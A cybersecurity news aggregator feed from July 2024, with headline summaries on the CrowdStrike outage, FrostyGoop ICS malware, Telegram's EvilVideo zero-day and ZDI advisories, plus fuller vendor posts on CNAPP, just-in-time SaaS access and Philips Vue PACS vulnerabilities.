Containerized applications deliver exceptional speed and flexibility, but they also bring complex security challenges, particularly in managing and mitigating vulnerabilities...

by Sysdig

2024-07-23 13:56:16

Mexico’s Largest ERP Provider ClickBalance Exposes 769 Million Records

ClickBalance ERP provider’s cloud database exposed 769 million records, including API keys and email addresses. Learn how this…

by Hackread

2024-07-23 13:40:56

Shocked, Devastated, Stuck: Cybersecurity Pros Open Up About Their Layoffs

Here's a dose of reality from those on the frontlines and how they're coping.

by Dark Reading

2024-07-23 13:39:27

Senate Democrats Demand OpenAI Detail Efforts To Make Its AI Safe

Following a Washington Post report, five Senate Democrats ask the artificial intelligence start-up to describe how it will ensure its tools don’t cause harm.

by ITPro Today

2024-07-23 13:00:44

More From Our Main Blog: SentinelOne Increases SOC Capabilities With Cloud Native Security (CNS)

Learn how SentinelOne's Cloud Native Security helps your security teams gain greater visibility and boost investigation efficiency.

by SentinelOne

2024-07-23 13:00:00

The Imperative of Threat Hunting for a Mature Security Posture

Threat Hunting has transitioned from being a luxury to a fundamental necessity.

by Binary Defense

2024-07-23 13:00:00

Zimperium is Named a Leader in the Forrester Wave™ for MTD

We are excited to share that Zimperium has been named a Leader in The Forrester Wave™: Mobile Threat Defense Solutions, Q3 2024.

by Zimperium

2024-07-23 12:06:00

Innovations to power secure-by-design development

by ComputerWeekly

2024-07-23 12:01:16

Sophos Germany Team Saddles Up for a Volunteering Day at Horse Therapy Farm

Sophos Employee Volunteering Program supports local equine-assisted therapy initiative.

by Sophos News

2024-07-23 11:03:53

CISOs and CIOs confront growing data protection challenges in the era of AI and cloud

Keepit, a global provider of a comprehensive cloud backup and recovery platform, today released a survey conducted by Foundry, as well as a study based on in-depth interviews conducted by Keepit. Both reveal critical gaps in disaster recovery strategies and highlight the pressing need for enhanced data security measures. In an evolving technological landscape, enterprise […]

by IT Security Guru

2024-07-23 11:01:05

Fake CrowdStrike hot fix leads to Remcos Trojan

To nobody's surprise, cybercriminals are abusing the CrowdStrike outage.

by ThreatDown

2024-07-23 11:00:00

What is the Driver's Privacy Protection Act (DPPA)?

by ComputerWeekly

2024-07-23 11:00:00

Women in IT Security Lack Opportunities, Not Talent

Much work remains to be done to ensure equal opportunities and a supportive environment for women in IT security.

by ITPro Today

2024-07-23 11:00:00

How To Deploy Your App on Microsoft HoloLens 2

Follow these steps to run your app on a HoloLens 2 device.

by ITPro Today

2024-07-23 10:48:45

Summertime, and the Zooming Is Easy

The flexible workplace has been great for employees' perceptions of greater work-life balance, but there's something to be said for completely disengaging from any workplace.

by ITPro Today

2024-07-23 10:46:53

Dragos warns of novel malware targeting industrial control systems

FrostyGoop, the ninth ICS-specific malware observed by Dragos, was linked to a January attack on an energy provider in Ukraine.

by Cybersecurity Dive

2024-07-23 10:44:38

Enhancing the cybersecurity talent pool is key to securing our digital future

As the global digital industry continues to grow, there has been an increased demand for both businesses and Governments to prioritise cybersecurity. Cybercrime rates are rising quickly: according to Cybersecurity Ventures, damage costs are set to increase by 15% per year until 2025, when it's estimated that the global cost of cybercrime could reach US$10.5 […]

by IT Security Guru

2024-07-23 10:34:25

Privilege escalation: unravelling a novel cyber-attack technique

Cyber criminals are notoriously relentless and unforgiving in their quest to exploit vulnerabilities through ever-evolving tactics. Organisations may believe that their security frameworks are robust, but when confronted with unprecedented attack methods, nobody is entirely immune to infiltration. Earlier this year, a multinational agriculture company learnt this the hard way when they fell victim to […]

by IT Security Guru

2024-07-23 10:19:27

The global computer blackout – RTS interview

Planes grounded, trains at a standstill, stock exchanges affected and problems in hospitals: a vast computer breakdown affected numerous services around the world on Friday 19th July.

by Zendata

2024-07-23 10:00:19

Vulnerabilities in LangChain Gen AI

This article is a detailed study of CVE-2023-46229 and CVE-2023-44467, two vulnerabilities discovered by our researchers affecting the generative AI framework LangChain.

by Palo Alto Networks - Unit42

2024-07-23 09:58:00

Google Abandons Plan to Phase Out Third-Party Cookies in Chrome

Google on Monday abandoned plans to phase out third-party tracking cookies in its Chrome web browser more than four years after it introduced the option as part of a larger and controversial proposal called the Privacy Sandbox. "Instead of deprecating third-party cookies, we would introduce a new experience in Chrome that lets people make an informed choice that applies across their web

by The Hacker News

2024-07-23 09:43:00

Why did CrowdStrike cause the Windows Blue Screen?

by ComputerWeekly

2024-07-23 09:00:45

Strengthen Your Cybersecurity: Understanding the NIS 2 Directive

Key insights into the NIS 2 Directive in this essential guide to new cybersecurity compliance for 2024.

by Sophos News

2024-07-23 09:00:00

Novel ICS Malware Sabotaged Water-Heating Services in Ukraine

Newly discovered "FrostyGoop" is the first ICS malware that can communicate directly with operational technology systems via the Modbus protocol.

by Dark Reading

2024-07-23 09:00:00

Hackers shut down heating in Ukrainian city with malware, researchers say

Cybersecurity firm Dragos and Ukrainian authorities found a cyberattack targeting critical infrastructure in Lviv.

by TechCrunch

2024-07-23 09:00:00

If You Only Have Five Minutes, Here’s CNAPP in a Snap (But We Have an eBook, Too)

If you’re a bit puzzled by all the talk about cloud native application protection platforms (CNAPPs), worry not. Our new eBook “Empower Your Cloud: Mastering CNAPP Security” explains in plain English what CNAPP is, how it works and why it’ll help you secure your cloud environment confidently. Read on to check out the eBook’s main highlights.

As organizations move operations to the cloud, the need for robust security measures has never been more critical. Cloud native application protection platforms (CNAPPs) offer comprehensive solutions designed to tackle the myriad threats and vulnerabilities that accompany cloud infrastructures. Tenable recently published an eBook, “Empower Your Cloud: Mastering CNAPP Security.” You can download it here. This post summarizes the key points, but read the book to get the full story.

The misunderstood shared responsibility model

Cloud security was built on a misleading concept: the shared responsibility model. On its surface, “shared responsibility” merely outlines the individual security responsibilities of cloud providers and customers. It seems straightforward, and the model does provide a framework for understanding security responsibilities. But customer beware: it usually places the onus on you to implement and maintain robust security measures.

A cottage industry rises to add to the confusion

In response to the rush to the cloud, a cottage industry of solutions has popped up, each handling a tiny sliver of the cloud security challenge. The end result is product fatigue. In an age of limited resources, when your day job has you focused on threats like ransomware and trying to ensure compliance, there are only so many alerts and systems you can pay attention to. After a while it’s all just noise.

Meanwhile, cloud breaches are almost universal

Amid that noise, the prevalence of cloud breaches underscores the urgency for more complete security measures. In Tenable's recent "Cloud Security Outlook" report, 95% of security professionals surveyed reported experiencing a cloud breach within an 18-month period, with an average of 3.6 breaches per respondent. These statistics highlight the pervasive nature of cloud security risks and the need for proactive measures to mitigate them. (Source: Tenable's "Cloud Security Outlook" report, May 2024)

CNAPPs to the rescue

CNAPP solutions replace the patchwork of siloed products that often cause more problems than they solve. Those products usually provide only partial coverage and often create overhead and friction with the products they’re supposed to work with. And in today's multi-cloud landscape, organizations often work with multiple cloud providers to optimize services and avoid vendor lock-in. The complexity of securing the cloud is multiplied when it becomes plural: clouds. Managing security across heterogeneous cloud infrastructures is a big challenge, and the traditional security tools provided by individual cloud vendors are often limited to their respective platforms, leading to fragmented security postures.

A comprehensive CNAPP solution includes a wide variety of essential capabilities: cloud security posture management (CSPM); cloud infrastructure entitlement management (CIEM); cloud workload protection (CWP); Kubernetes security posture management (KSPM); infrastructure as code (IaC) scanning; cloud detection and response (CDR); and data security posture management (DSPM).

Must-have CNAPP components

As you evaluate CNAPPs, make sure you cover your bases on three key components: identity and access management to ensure least-privilege access; vulnerability management to prioritize and remediate vulnerabilities based on their potential impact; and exposure management to gain visibility across cloud environments and mitigate risks that stem from toxic combinations of vulnerabilities, misconfigurations and excessive permissions.

How CNAPPs can help you

CNAPPs benefit a wide range of stakeholders involved in cloud security, including security, DevOps, DevSecOps, IAM and IT teams. A CNAPP also helps those disparate groups collaborate to reduce cloud environment risks. Enterprises stand to gain a number of advantages, including enhanced visibility, consistent security posture, streamlined infrastructure health, minimal overhead, seamless integration, shift-left security and holistic security coverage. Check out this short video, in which a Tenable security engineer explains some CNAPP benefits experienced by Tenable customers.

Learn more

To learn more about CNAPPs, read our new eBook “Empower Your Cloud: Mastering CNAPP Security.”

by Tenable

2024-07-23 09:00:00

How Russia-Linked Malware Cut Heat to 600 Ukrainian Buildings in Deep Winter

The code, the first of its kind, was used to sabotage a heating utility in Lviv at the coldest point in the year—what appears to be yet another innovation in Russia’s torment of Ukrainian civilians.

by WIRED Security News

2024-07-23 08:46:00

CrowdStrike says flawed update was live for 78 minutes

Though CrowdStrike pulled the update, companies across sectors were already dealing with the cascading consequences that required manual remediations.

by Cybersecurity Dive

2024-07-23 08:45:36

US Gov sanctioned key members of the Cyber Army of Russia Reborn hacktivists group

The US government sanctioned two Russian hacktivists for their cyberattacks targeting critical infrastructure, including breaches of water facilities. The United States sanctioned Russian hacktivists Yuliya Vladimirovna Pankratova and Denis Olegovich Degtyarenko, members of the Russian hacktivist group Cyber Army of Russia Reborn (CARR), for their roles in cyber operations against U.S. critical infrastructure. The US […]

by Security Affairs

2024-07-23 08:01:46

Unveiling the Scam: How Fraudsters Abuse Legitimate Blockchain Protocols to Steal Your Cryptocurrency Wallet

Research by Dikla Barda, Roman Ziakin and Oded Vanunu. Check Point’s Threat Intel blockchain system identified and alerted that, in recent times, fraudsters have become increasingly sophisticated, exploiting legitimate blockchain protocols to conduct their scams. The Uniswap Protocol, launched in 2018, is the largest and most popular decentralized exchange for swapping cryptocurrency tokens […]

by Check Point Research

2024-07-23 07:17:54

Powering People-Centric HR Practices with Generative AI

As we grapple with the ongoing phenomenon of the generative AI (GenAI) boom, one thing we’ve consistently observed is that businesses keep interacting with data in ways that haven’t been previously accounted for. For HR leaders who deal with that most sensitive of data types – data involving people – prioritizing data security has never been more essential. At Forcepoint,...

by Forcepoint Blog

2024-07-23 05:56:00

You’re now part of an inside job! Season 6 brings you into the world of heists

Your third rift has brought you some sense of normalcy. But don’t get too comfy, there’s work to be done.

by Hack The Box Blog

2024-07-23 05:39:09

Philips Discloses Multiple VUE PACS Vulnerabilities: Healthcare Sector Walking on Thin Ice

Internet-Exposed VUE PACS: A Storm Brewing in Hindsight

On July 18, 2024, Philips issued a security advisory addressing vulnerabilities within Philips Vue Picture Archiving and Communication System (PACS) versions prior to 12.2.8.410.

The Philips Vue PACS is a sophisticated medical imaging solution used to manage, store, and transmit digital medical images and reports. Primarily employed in hospitals, diagnostic imaging centers, and other healthcare facilities, this system facilitates the storage and retrieval of images from multiple modalities such as X-rays, MRI, CT scans, and ultrasound. The PACS integrates with Electronic Medical Records (EMR) and Radiology Information Systems (RIS), allowing healthcare professionals to access and share patient images and reports seamlessly, improving diagnostic accuracy and patient care. By streamlining workflows and improving access to critical imaging data, Philips Vue PACS is intended to enhance clinical decision-making and operational efficiency in the Healthcare and Public Health Sectors.

Among the thirteen vulnerabilities disclosed by Philips to government agencies, including the U.S. Cybersecurity Infrastructure and Security Agency (CISA), the majority of vulnerabilities fall under the High and Critical severity category (as shown in Table 1).

Cyberattacks targeting the healthcare sector are on the rise, posing significant threats to patient safety, data privacy, and the operational stability of medical institutions. Recent vulnerabilities, such as those identified in Philips Vue PACS, exacerbate these risks, making healthcare systems more susceptible to exploitation. Upon successful exploitation, attackers could potentially gain unauthorized access to sensitive patient data, disrupt critical medical services, and even manipulate diagnostic information. The table below provides details on the recent vulnerabilities.

| CVE | Vulnerability Type | CVSS 3.1 | CVSS 4 |
|---|---|---|---|
| CVE-2020-36518 | Out of Bounds Write | 5.3 | 7.1 |
| CVE-2020-11113 | Deserialization of Untrusted Data | 8.8 | 7.1 |
| CVE-2020-35728 | Deserialization of Untrusted Data | 8.1 | 9.3 |
| CVE-2021-20190 | Deserialization of Untrusted Data | 8.1 | 9.3 |
| CVE-2020-14061 | Deserialization of Untrusted Data | 8.1 | 9.3 |
| CVE-2020-10673 | Deserialization of Untrusted Data | 8.8 | 8.7 |
| CVE-2019-12814 | Deserialization of Untrusted Data | 5.9 | 8.7 |
| CVE-2017-17485 | Deserialization of Untrusted Data | 9.8 | 9.3 |
| CVE-2021-28165 | Uncontrolled Resource Consumption | 7.5 | 8.8 |
| CVE-2023-40704 | Use of Default Credentials | 7.1 | 8.4 |
| CVE-2023-40539 | Weak Password Requirement | 4.4 | 4.8 |
| CVE-2023-40159 | Exposure of Sensitive Information to an Unauthorized Actor | 8.2 | 8.8 |

Table 1: Vulnerability details of Philips VUE PACS

Patch Details

- For vulnerabilities CVE-2020-36518, CVE-2020-11113, CVE-2020-35728, CVE-2021-20190, CVE-2020-14061, CVE-2020-10673, CVE-2019-12814, CVE-2017-17485, CVE-2023-40223, and CVE-2023-40159, Philips recommends upgrading to the latest Vue PACS version 12.2.8.400* released in August 2023.
- For CVE-2021-28165, Philips recommends configuring the Vue PACS environment per D000763414 – Vue_PACS_12_Ports_Protocols_Services_Guide available on Incenter. Philips also recommends upgrading to the Vue PACS version 12.2.8.410* released in October 2023.
- For CVE-2023-40704 and CVE-2023-40539, Philips recommends configuring the Vue PACS environment per 8G7607 – Vue PACS User Guide Rev G available on Incenter.

Philips VUE PACS’ Internet Exposure

The disclosed vulnerabilities (Table 1) can be exploited remotely and have low attack complexity. Hence, Cyble Research and Intelligence Labs (CRIL) investigated the impacted product's internet exposure and observed 495 internet-exposed Philips VUE PACS instances.

It was observed that Brazil and the United States had the highest number of Philips VUE PACS exposures; the graph below provides insights into the top 5 countries with the highest number of exposures. CRIL's investigation discovered that the internet-exposed PACS are being used by multiple healthcare facilities globally, as shown in the screenshot below.

Figure 1: Screenshot indicating VUE PACS utilized by healthcare facilities

Conclusion

The Healthcare and Public Health sectors are vastly dependent on Picture Archiving and Communication Systems (PACS) due to the nature of operations within this environment; at the same time, the operations performed via PACS become a lucrative target for Threat Actors (TAs).

The recent vulnerabilities within Philips VUE PACS and the affected product's internet exposure might be leveraged by TAs in the near future for data breaches that compromise patients' privacy, undermine trust in healthcare institutions, and even jeopardize patient safety by delaying critical medical diagnoses and treatments.

Therefore, regular patching and updating of PACS are essential steps that need to be continuously taken to verify the security and integrity of healthcare operations, protect patient information, and maintain the overall resilience of healthcare services.

Recommendations

- Implement the latest patch released by the official vendor: Regularly update all software and hardware systems with the latest patches from official vendors to mitigate vulnerabilities and protect against exploits. Establish a routine schedule for patch application and ensure critical patches are applied immediately.
- Implement proper network segmentation to avoid exposing critical assets over the Internet: Divide your network into distinct segments to isolate critical assets from less secure areas. Use firewalls, VLANs, and access controls to limit access and reduce the attack surface exposed to potential threats.
- Incident response and recovery plan: Create and maintain an incident response plan that outlines procedures for detecting, responding to, and recovering from security incidents. Regularly test and update the plan to ensure its effectiveness and alignment with current threats.
- Vulnerability Assessment and Penetration Testing (VAPT) exercises and auditing: Conduct regular VAPT exercises to identify and remediate vulnerabilities in your systems. Complement these exercises with periodic security audits to ensure compliance with security policies and standards.
- Enhance your visibility into your organization's external and internal assets: Maintain an up-to-date inventory of all internal and external assets, including hardware, software, and network components. Use asset management tools and continuous monitoring to ensure comprehensive visibility and control over your IT environment.

References:

https://www.cisa.gov/news-events/ics-medical-advisories/icsma-24-200-01
https://www.philips.com/a-w/security/security-advisories.html

The post Philips Discloses Multiple VUE PACS Vulnerabilities: Healthcare Sector Walking on Thin Ice appeared first on Cyble.

by CYBLE

2024-07-23 03:04:35

Wiz walks away from Google’s $23B acquisition offer: Read the CEO’s note to employees

Cybersecurity startup Wiz has turned down a $23 billion acquisition offer from Alphabet, Google’s parent company, according to a source familiar with discussions. Despite the offer representing a substantial premium over its last private valuation of $12 billion, Wiz’s management team with the support of investors has opted to remain independent, the person said. Wiz’s […] © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

2024-07-23 00:00:00

ZDI-24-957: (0Day) Comodo Internet Security Pro cmdagent Link Following Local Privilege Escalation Vulnerability

This vulnerability allows local attackers to escalate privileges on affected installations of Comodo Internet Security Pro. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8.

by Zero Day Initiative Advisories

2024-07-23 00:00:00

ZDI-24-956: (0Day) Comodo Internet Security Pro cmdagent Link Following Local Privilege Escalation Vulnerability

This vulnerability allows local attackers to escalate privileges on affected installations of Comodo Internet Security Pro. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8.

by Zero Day Initiative Advisories

2024-07-23 00:00:00

ZDI-24-955: (0Day) Comodo Internet Security Pro cmdagent Link Following Local Privilege Escalation Vulnerability

This vulnerability allows local attackers to escalate privileges on affected installations of Comodo Internet Security Pro. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8.

by Zero Day Initiative Advisories

2024-07-23 00:00:00

ZDI-24-954: (0Day) Comodo Firewall Link Following Local Privilege Escalation Vulnerability

This vulnerability allows local attackers to escalate privileges on affected installations of Comodo Firewall. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8.

by Zero Day Initiative Advisories

2024-07-23 00:00:00

ZDI-24-953: (0Day) Comodo Internet Security Pro Directory Traversal Local Privilege Escalation Vulnerability

This vulnerability allows local attackers to escalate privileges on affected installations of Comodo Internet Security Pro. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8.

by Zero Day Initiative Advisories

2024-07-22 21:53:20

EvilVideo, a Telegram Android zero-day allowed sending malicious APKs disguised as videos

EvilVideo is a zero-day in the Telegram App for Android that allowed attackers to send malicious APK payloads disguised as videos. ESET researchers discovered a zero-day exploit named EvilVideo that targets the Telegram app for Android. The exploit was for sale on an underground forum from June 6, 2024, it allows attackers to share malicious […]

by Security Affairs

2024-07-22 21:34:02

Linx Security Launches With Identity Management Platform

The Israeli security startup's technology helps organizations map existing accounts and credentials to existing employees to identify those that should be removed.

by Dark Reading

2024-07-22 21:21:43

Microsoft Releases Tool to Fix CrowdStrike-Caused Windows Chaos

Microsoft releases a recovery tool to fix CrowdStrike outages that crippled IT systems worldwide. The tool offers two…

by Hackread

2024-07-22 20:16:27

When Scammers Call Grandma

So-called "grandparent scams" or "family emergency scams" target older adults and usually occur over the phone, although other means of communication can be used. The scammers impersonate law enforcement, attorneys, or the relatives themselves. The criminals work to convince the victim that a family member is in deep trouble, a lot of money is required, and the victim has to keep it all a secret. With the rise of audio and video-generative AI, these scams are harder to detect. Still, there are red flags to look for. You should also talk to your family about these incidents and how you can all work together to stay safe. The post When Scammers Call Grandma appeared first on National Cybersecurity Alliance.

by National Cybersecurity Alliance

2024-07-22 18:55:27

Teenage Scattered Spider Suspect Arrested in Global Cybercrime Sting

The authorities intend to send a message to these cybercrime groups that their criminal offenses and ransomware attacks are not worth the fallout.

by Dark Reading

2024-07-22 18:36:16

Phishing Attacks Will Likely Follow Last Week’s Global IT Outage

Organizations should expect to see phishing attacks exploiting the global IT outage that occurred last Friday, the Business Post reports.

by KnowBe4

2024-07-22 18:36:12

[Security Masterminds Podcast] Securing Software Over 50 Years: Reflections from an Industry Veteran

Does the challenge of keeping up with cybersecurity trends sound familiar? You may have been told to update your antivirus software and hope for the best, only to find that your digital assets are still at risk.

by KnowBe4

2024-07-22 18:35:00

Experts Uncover Chinese Cybercrime Network Behind Gambling and Human Trafficking

The relationship between various TDSs and DNS associated with Vigorish Viper and the final landing experience for the user

A Chinese organized crime syndicate with links to money laundering and human trafficking across Southeast Asia has been using an advanced "technology suite" that runs the whole cybercrime supply chain spectrum to spearhead its operations. Infoblox is tracking the proprietor

by The Hacker News

2024-07-22 18:23:04

How Behavioral Detections Aid Healthcare Security

Healthcare organizations face unique cybersecurity challenges due to their hybrid IT (information technology) environments, sensitive data, and resource constraints.

by Mitiga

2024-07-22 18:18:55

Swipe Right for Data Leaks: Dating Apps Expose Location, More

Apps like Tinder, Bumble, Grindr, Badoo, OKCupid, MeetMe, and Hinge all have API vulnerabilities that expose sensitive user data, and six allow a threat actor to pinpoint exactly where someone is.

by Dark Reading

2024-07-22 18:02:33

Threat Hunting Market Worth $6.9B by 2029

by Dark Reading

2024-07-22 17:57:53

Telegram Android Vulnerability “EvilVideo” Sends Malware as Videos

EvilVideo exploit in Telegram for Android lets attackers send malware disguised as videos. ESET discovered this zero-day vulnerability,…

by Hackread

2024-07-22 17:56:00

PINEAPPLE and FLUXROOT Hacker Groups Abuse Google Cloud for Credential Phishing

A Latin America (LATAM)-based financially motivated actor codenamed FLUXROOT has been observed leveraging Google Cloud serverless projects to orchestrate credential phishing activity, highlighting the abuse of the cloud computing model for malicious purposes. "Serverless architectures are attractive to developers and enterprises for their flexibility, cost effectiveness, and ease of use," Google

by The Hacker News

2024-07-22 17:06:02

Russian Hacktivists Sanctioned for US Critical Infrastructure Attacks

"CARR" hackers have managed to gain control over ICS and SCADA systems in the US and Europe.

by Dark Reading

2024-07-22 16:59:04

Chinese Vigorish Viper Exploits DNS and Football Sponsorships for Illegal Gambling

Unmasking Vigorish Viper: The Elusive Cybercrime Network Behind Illegal Gambling. Learn how this sophisticated group uses clever DNS…

by Hackread

2024-07-22 16:55:00

How to Set up an Automated SMS Analysis Service with AI in Tines

The opportunities to use AI in workflow automation are many and varied, but one of the simplest ways to use AI to save time and enhance your organization’s security posture is by building an automated SMS analysis service. Workflow automation platform Tines provides a good example of how to do it. The vendor recently released their first native AI features, and security teams have already

by The Hacker News

2024-07-22 16:45:50

Quantum Leap: Advanced Computing Is a Vulnerable Cyber Target

At Black Hat USA, researchers from Bitdefender and Transilvania Quantum will showcase how attackers can target quantum-based infrastructure.

by Dark Reading

2024-07-22 16:37:09

CrowdStrike’s fallout, Harris’s stance on tech and Yandex’s rise from the ashes

On today’s episode of Equity, Rebecca Bellan did a deep dive into the CrowdStrike outage that affected around 8.5 million Windows devices around the world, causing disruptions in air travel, banking, hospitals, media outlets, federal agencies and businesses of all kinds. The outage began when CrowdStrike, a cloud security giant, sent out a defective software […]

by TechCrunch

2024-07-22 16:23:32

🐝 Hive Five 181 - What the Dying Teach the Living

Innovative Recon Tool: Lemma, AI Tooling for Software Engineers in 2024, Embrace Action Over Perfection, 12-Minute Foundation Training, and more...

by Hive Five

2024-07-22 16:11:00

MSPs & MSSPs: How to Increase Engagement with Your Cybersecurity Clients Through vCISO Reporting

As a vCISO, you are responsible for your client's cybersecurity strategy and risk governance. This incorporates multiple disciplines, from research to execution to reporting. Recently, we published a comprehensive playbook for vCISOs, “Your First 100 Days as a vCISO – 5 Steps to Success”, which covers all the phases entailed in launching a successful vCISO engagement, along with recommended

by The Hacker News

2024-07-22 16:00:00

TechCrunch Minute: What caused last week’s major tech outage?

Late last week, there was a worldwide tech outage that affected everything from airports to banks to healthcare. Flights were grounded across the United States. So, what actually happened? The source of all those problems seems to be a popular cybersecurity company called CrowdStrike and its flagship software product Falcon Sensor. Apparently a “defect” in […]

by TechCrunch

2024-07-22 15:09:38

Pair of court rulings have cybersecurity implications

CISOs and other security professionals should carefully consider the legal ramifications and any personal liability when discussing the state of cybersecurity in their organization.

by Barracuda

2024-07-22 15:02:41

Cloudy with a Chance of Hackers: Protecting Critical Cloud Workloads

If you've been following along with David's posts, you'll have noticed a structure to the topics: Part I: The Plan, Part II: The Execution and now we move into Part III: Security Operations. Things get a bit more exciting at this point as we discuss topics to detect, delay and mitigate active cyber threats. The planning and delivery of our security solutions are about to pay off!

by SpiderLabs Blog

2024-07-22 14:58:50

Heritage Foundation data breach containing personal data is available online

Data from the Heritage Foundation containing at least half a million passwords and usernames are available online

by Malwarebytes Labs

2024-07-22 14:41:52

Countdown to Paris 2024 Olympics: France leads in web interest

As the Paris 2024 Olympics approach, our analysis reveals France, the host nation, leads in DNS traffic to official Olympic sites, followed by the UK, the US, and Australia

by Cloudflare

2024-07-22 14:23:13

Fallout From Faulty Friday CrowdStrike Update Persists

Historic IT outage expected to spur regulatory scrutiny, soul-searching over "monoculture" of IT infrastructure — and cyberattack threats.

by ITPro Today

2024-07-22 14:00:00

Kaspersky Is an Unacceptable Risk Threatening the Nation's Cyber Defense

As geopolitical tensions rise, foreign software presents a grave supply chain risk and an ideal attack vector for nation-state adversaries.

by Dark Reading

2024-07-22 14:00:00

Sysdig Threat Research Team – Black Hat 2024

The Sysdig Threat Research Team (TRT) is on a mission to help secure innovation at cloud speeds. A group of... The post Sysdig Threat Research Team – Black Hat 2024 appeared first on Sysdig.

by Sysdig

2024-07-22 13:30:37

Ransomware Attack Shuts Down LA County Courts, Halts Inmate Transfers, Evictions

The Superior Court of Los Angeles County, the United States’ largest trial court, has suffered a crippling ransomware…

by Hackread

2024-07-22 13:02:14

22nd July – Threat Intelligence Report

For the latest discoveries in cyber research for the week of 22nd July, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES American Bassett Furniture Industries has been a victim of a ransomware attack that resulted in the encryption of data files and the shutdown of its manufacturing facilities. The attack has significantly disrupted […] The post 22nd July – Threat Intelligence Report appeared first on Check Point Research.

by Check Point Research

2024-07-22 13:00:00

Chinese Forced-Labor Ring Sponsors Football Clubs, Hides Behind Stealth Tech

An illegal gambling empire fueled by modern-day slavery is being propped up by high-profile sponsorships — and defended with sophisticated anti-detection software.

by Dark Reading

2024-07-22 13:00:00

Improving Your Cloud Security Using JIT Access for Sensitive SaaS Applications

Using just-in-time controls to secure access to your SaaS applications will reduce your cloud attack surface by avoiding permanent access and enforcing least privilege.

By granting permissions on a time-limited, as-needed basis only, just-in-time (JIT) controls are an important security mechanism for protecting access to cloud resources. JIT access is becoming a popular cloud security practice, with enterprises applying it innovatively in real-world scenarios.

It turns out that another excellent cloud use case for JIT has evolved. For easier security scaling, many organizations are using their identity provider’s groups function (IdP groups) to grant and manage access to software-as-a-service (SaaS) applications, such as those from Salesforce. By applying JIT to IdP groups, organizations can apply the best practice of role-based access management to their SaaS apps and ensure access is granted only as needed. Adopting this new use case is a simple next step for security teams already using JIT for cloud resources.

Specifically, by applying JIT to IdP groups you can create an access-request flow in which users request either one-off access or permissions elevation, and requests are evaluated or granted either automatically or by a designated approver. Access is limited to just hours and becomes process-driven, with the granted privileges revoked upon expiration. JIT prevents the risk posed by permanent access to SaaS applications by narrowing the window of opportunity for malicious use of compromised credentials and vulnerabilities.

Why is JIT access for SaaS applications important?

Social engineering (including phishing), credentials compromise and malicious internal users are common beachheads for penetrating a cloud environment. Once bad actors gain access, excessive permissions such as permanent access (aka standing permissions) open your environment to compromise. Placing time-bound limits on permissions helps prevent exposure to such attack vectors.

Using JIT to engineer temporary access for cloud resources and also for sensitive cloud applications not only makes your cloud environment more secure, it also enforces the least privilege practices required by compliance regulations. It’s important to note that the SaaS user is typically a business user. So using JIT to control access to sensitive SaaS applications extends security beyond development and IT users to the organization’s business environment. Security leaders have an organic opportunity to capitalize on existing use of JIT for cloud resources to drive adoption of JIT for SaaS apps, scaling security and improving their enterprise’s cloud security maturity.

What to look for in JIT access for SaaS

For future-proofing your JIT investment, make sure you consider a JIT access capability that supports your current cloud identity provider and others. You’ll want to evaluate JIT tooling that is part of a comprehensive cloud security solution, namely, a cloud native application protection platform (CNAPP) that includes strong capabilities for cloud identity entitlement management (CIEM) and data security posture management (DSPM). CIEM makes it easier to detect where you have the most significant identity risks that warrant mitigating using the JIT approach. DSPM helps you understand which resources are more sensitive than others. Overall, JIT implemented as part of a CNAPP provides insight into multi-cloud risk and context across your infrastructure, workloads, identities and data that is inherently lacking in standalone JIT tooling.

Be sure your JIT solution for cloud provides full reporting on access requests and denials, changes in eligibility and user activities during temporary access.

How JIT for SaaS applications works

Here’s an example of how Tenable Cloud Security, our CNAPP solution, has implemented JIT for SaaS. The process is straightforward and takes just a few minutes.

First, security personnel and/or system/applications administrators, working with the IdP groups function of their organization’s IdP, create an eligibility for the business application for which they want to enable temporary access. Next, any user in the organization seeking access to the business application uses a collaboration tool like Slack or Microsoft Teams, or Tenable’s cloud JIT portal, to submit a temporary access request. Approval is granted automatically or by the designated approvers, as specified within the eligibility. Automatic approvals are according to the permissions defined for the group or groups for which the user is eligible.

Step 1. Security teams create eligibilities with time-bound access

In a few clicks, security personnel or the relevant admin create an eligibility. This involves specifying the group that has permissions to the application, the principals (user or group) that can submit requests, maximum session duration and designated approvers.

Tenable Cloud Security enables security teams, system admins and application admins, using the IdP group function of their identity provider such as Microsoft Entra ID, to define eligibilities to easily manage temporary access requests to SaaS applications.

Step 2. Users request temporary access

In Slack, Microsoft Teams or the Tenable Cloud Security self-service JIT portal, users specify the desired permissions, access duration and start time, and provide a brief business justification.

Tenable Cloud Security enables an organization’s users, via Slack, Microsoft Teams or its self-service JIT portal, to request temporary access (access they don’t yet have at all, or elevated access) to the desired application.

When temporary access is approved, the user can see, within their IdP, their assigned access to the requested application.

Nothing good lasts forever, and that’s the raison d’être of JIT. When the session expires, Tenable Cloud Security automatically revokes the user’s permissions. Depending on the case, the user will no longer have access to the application or access will be based on their original permissions.

In short, Tenable Cloud Security’s JIT for cloud helps organizations protect both cloud resources and SaaS applications across AWS, Azure, Google Cloud Platform and Oracle, and seamlessly expand their familiar use of JIT to cover SaaS apps as well. Tenable’s cloud JIT is AWS-validated for IAM Identity Center.

To learn more, check out our Tenable JIT for IdP recorded demo below, or request a live demo on Tenable Cloud Security overall or on Tenable CIEM and JIT in particular.

Using JIT Access for Sensitive SaaS Applications

by Tenable

2024-07-22 12:59:04

Linx emerges from stealth with $33M to lock down the new security perimeter: Identity

Identity management is one of the most common fulcrums around which security breaches have pivoted in the last several years. One of the main reasons it has become the gift that keeps on giving to malicious hackers is that it’s a nightmare for organizations to track. A security startup founded in Tel Aviv called Linx […]

by TechCrunch

2024-07-22 12:43:55

More Enterprises Want Hybrid Cloud, Not Public

A new report from research firm ISG shows U.S. enterprises are choosing hybrid cloud over public due to cost and control. Gen AI plays a role in the trend.

by ITPro Today

2024-07-22 12:15:00

SocGholish Malware Exploits BOINC Project for Covert Cyberattacks

